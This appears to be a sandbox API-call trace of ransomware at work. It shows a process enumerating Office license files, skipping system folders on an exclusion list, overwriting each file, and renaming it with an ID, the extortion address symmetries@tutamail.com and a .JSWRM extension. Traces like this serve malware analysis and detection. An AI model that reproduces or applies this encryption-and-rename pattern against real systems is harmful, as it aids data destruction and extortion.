WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x241358, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0104.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20dde8 [0104.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 31 [0104.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0104.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-ppd.xrm-ms", cchWideChar=31, lpMultiByteStr=0x240f70, cbMultiByte=31, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription2-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 31 [0104.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20dde8 | out: hHeap=0x1e0000) returned 1 [0104.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0104.129] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.129] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236748 [0104.129] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.130] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=32362) returned 1 [0104.130] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.130] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x7e60) returned 0x24c1d0 [0104.130] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x7e60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x7e60, lpOverlapped=0x0) returned 1 [0104.143] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.143] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x7e60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x7e60, lpOverlapped=0x0) returned 1 [0104.146] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.146] CloseHandle (hObject=0x45c) returned 1 [0104.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236240 [0104.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0104.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0104.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0104.147] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0104.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.147] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x106) returned 0x23e110 [0104.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.147] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.147] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23e110 | out: hHeap=0x1e0000) returned 1 [0104.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236240 | out: hHeap=0x1e0000) returned 1 [0104.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236748 | out: hHeap=0x1e0000) returned 1 [0104.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0104.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0104.148] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe53fab78, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe53fab78, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe54df9d2, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d60, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_Subscription2-ul-oob.xrm-ms", cAlternateFileName="MO3A09~1.XRM")) returned 1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2=".") returned 1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2="..") returned 1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2="...") returned 1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2="windows") returned -1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2="perflogs") returned -1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0104.148] lstrcmpiW (lpString1="MondoR_Subscription2-ul-oob.xrm-ms", lpString2="msocache") returned -1 [0104.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0104.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0104.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0104.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d298, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0104.148] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0104.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0104.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0104.148] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.148] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_Subscription2-ul-oob.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_Subscription2-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0104.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0104.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235c80 [0104.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0104.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.149] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236800 [0104.149] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-ul-oob.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.149] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11616) returned 1 [0104.149] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d60) returned 0x24c1d0 [0104.149] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2d60, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2d60, lpOverlapped=0x0) returned 1 [0104.152] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.152] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2d60, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2d60, lpOverlapped=0x0) returned 1 [0104.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.152] CloseHandle (hObject=0x45c) returned 1 [0104.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235ea8 [0104.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0104.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a360 [0104.152] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a360, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a360 | out: hHeap=0x1e0000) returned 1 [0104.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b6a0 [0104.152] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23ef08 [0104.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b6a0 | out: hHeap=0x1e0000) returned 1 [0104.152] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0104.152] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_Subscription2-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subscription2-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0104.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235ea8 | out: hHeap=0x1e0000) returned 1 [0104.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236800 | out: hHeap=0x1e0000) returned 1 [0104.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.153] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0104.153] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4ff4c1f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4ff4c1f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe50d9a48, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2b8b, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTest-pl.xrm-ms", cAlternateFileName="MO7C66~1.XRM")) returned 1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2="recovery") returned -1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2="perflogs") returned -1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2="system volume information") returned -1 [0104.153] lstrcmpiW (lpString1="MondoR_SubTest-pl.xrm-ms", lpString2="msocache") returned -1 [0104.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d800 [0104.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0104.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0104.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x240fc0, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0104.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d800 | out: hHeap=0x1e0000) returned 1 [0104.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x40) returned 0x20d698 [0104.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 24 [0104.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0104.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MondoR_SubTest-pl.xrm-ms", cchWideChar=24, lpMultiByteStr=0x2411c8, cbMultiByte=24, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MondoR_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 24 [0104.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20d698 | out: hHeap=0x1e0000) returned 1 [0104.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0104.154] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235c80 | out: hHeap=0x1e0000) returned 1 [0104.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0104.154] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0104.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0104.154] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0104.154] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11147) returned 1 [0104.154] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.154] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2b80) returned 0x24c1d0 [0104.155] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2b80, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2b80, lpOverlapped=0x0) returned 1 [0104.157] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0104.157] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2b80, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2b80, lpOverlapped=0x0) returned 1 [0104.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0104.157] CloseHandle (hObject=0x45c) returned 1 [0104.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0104.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0104.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0104.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0104.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0104.157] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0104.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0104.157] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a330 [0104.157] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a330, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0104.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a330 | out: hHeap=0x1e0000) returned 1 [0104.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d140 [0104.161] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2471d0 [0104.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d140 | out: hHeap=0x1e0000) returned 1 [0104.161] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0104.161] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\MondoR_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\mondor_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0104.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2471d0 | out: hHeap=0x1e0000) returned 1 [0104.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0104.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0104.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0104.162] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0104.162] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe4ff4c1f, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe4ff4c1f, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe533c027, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x679c, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="MondoR_SubTest-ppd.xrm-ms", cAlternateFileName="MOCE88~1.XRM")) returned 1 [0104.162] lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0104.162] lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0104.162] lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0104.162] lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0104.162] lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2="recovery") returned -1 [0104.162] lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2="perflogs") returned -1 [0104.162] lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0104.162] lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0104.162] lstrcmpiW (lpString1="MondoR_SubTest-ppd.xrm-ms", lpString2="system volume information") returned -1 [0104.162] 